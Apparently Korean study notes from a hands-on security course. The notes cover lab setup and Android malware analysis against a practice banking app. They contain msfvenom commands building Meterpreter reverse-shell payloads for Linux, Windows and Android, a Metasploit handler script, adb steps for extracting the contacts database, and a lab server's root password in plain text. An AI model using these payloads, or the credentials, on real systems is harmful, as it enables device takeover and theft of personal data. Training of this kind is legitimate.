산특관리서버 : 192.168.0.252 (root, p@ssw0rd!@123)
> 192.168.0.18 / (22018,8018,21018) > 관리 잘하기
Ubuntu 22.04 GUI 파일 Vmware에 설치 > 스냅샷 걸기
아나콘다 설치
녹스 설치 > 모바일 악성코드 분석을 위함
악성코드 만들기 (리눅스, 윈도우, 모바일 전용)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.208 LPORT=4444 -f elf -o /home/kali/Desktop/kitesong.elf
msfvenom -platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.208 LHOST=4444 -b "\x00" -f exe -o /home/kali/Desktop/kitesong.exe
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.208 LPORT=4444 -o /home/kali/Desktop/kitesong.apk
#가상환경 만들기
anaconda power shell prompt
desktop/py 아래에
conda create -n py27 python=2.7
conda create -n py38 python=3.8
> 3.8 깔아줌
conda env list
> 다운로드 됐는지 보여줌
conda activate py27
conda activate py38
> (base)가 (py38)
conda env remove -n py27
> 삭제방법
searchsploit fuel cms
pip install -r requirements.txt
python app.py --help
python app.py
미션
ESXI 서버 설정 > 192.168.0.252 접속해서 아이피 추가
apm 설치 및 FTP 작동여부 확인
apt -y install apache2
apt -y install mariadb-server
spt -u install php php-mysql
apt -y install lamp-server^
apt -y install vsftpd
nano /etc/vsftpd.conf
write_enable=yes > 주석해제
nano /etc/apache2.conf
nano /etc/apache2/site-[tab]/000[tab]
> var/www/html에서 /home/mastar/public_html 로 변경
파일 권한 644 / 디렉토리 권한 755 변경
a2enmod userdir
systemctl restart apache2
a2dismod userdir
systemctl restart apache2
녹스에서 가상은행 열어서 로그인 할 수 있는 정보 찾아보기
https://sqlitebrowser.org/dl/
DB Browser for SQLite - Standard installer for 64-bit Windows 다운
데이터베이스 불러오기 > 테이블 확인
녹스에 설치한 가상은행 프로그램 접속
> Preferences에서 아이피 번호 컴퓨터 아이피(192.168.0.208)로 변경
> 테이블에 적힌 username, password 입력
> 로그인 가능
방금 설치한 은행어플이 어디 경로 설치 되었는지 / 은행어플에서 볼 수 있는 정보가 무엇인지
악성코드로 칼리와 모바일 연결
nano malware.rc
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.56.101
set lport 4444
exploit
adb 디버그 브리지 > 기기와 통신할 수 있도록 지원하는 다목적 명령줄 도구
cd adb
adb connect 127.0.0.1:62001
adb devices
adb shell
ls
리눅스와 안드로이드 구조 비교해보기
주소록 위치 찾기
/data/data/com.android.providers.contacts/databases/contacts2.db > phone_lookup
DB 꺼내오는 법
adb(디렉토리) pull (/data/data/com.android.providers.contacts/databases/contacts2.db) 경로